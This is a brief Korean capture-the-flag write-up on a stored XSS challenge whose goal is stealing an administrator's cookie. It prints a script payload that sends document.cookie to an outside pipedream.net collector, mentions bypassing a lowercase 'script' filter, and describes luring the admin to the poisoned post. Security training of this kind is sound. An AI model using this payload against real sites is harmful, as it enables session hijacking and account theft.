Segfault CTF - (10주 차) XSS 4

※ 주의 : 보안 관련 학습은 자유이지만, 학습 내용을 사용한 경우 법적 책임은 행위자에게 있습니다.
(Note: Security-related learning is allowed, but the individual is solely responsible for any legal consequences arising from the use of the acquired knowledge.)

※ CTF - Capture The Flag
※ 문제 푸는 방법이 다양할 수도 있습니다.

---

SegFault CTF - XSS 4

1. 목표 : 관리자의 Cookie를 탈취하세요!

2. 실행 

• XSS 취약점 찾기
  [보안 공부] 9주 차 - XSS(크로스 사이트 스크립팅), 보고서 작성에서 소문자 script를 필터링이 되고 있지만 필터링을 우회하면 게시글 제목 및 내용에서 스크립트 실행이 가능했고, 이를 이용하기로 한다.
• 스크립트 작성
  <script>var i = new Image(); i.src="https://enmqaeuyiny5.x.pipedream.net/?cookiedata="+document.cookie;</script>
  
  Stored XSS 게시글 작성
  

  

  제목단에서 스크립트를 넣으려니 너무 길다고 안되었다.

  
  
• 관리자 쿠키 탈취
  

  

  관리자에게 Stored XSS 되어있는 게시글을 보도록 유도한다.

  

  쿠키 탈취 성공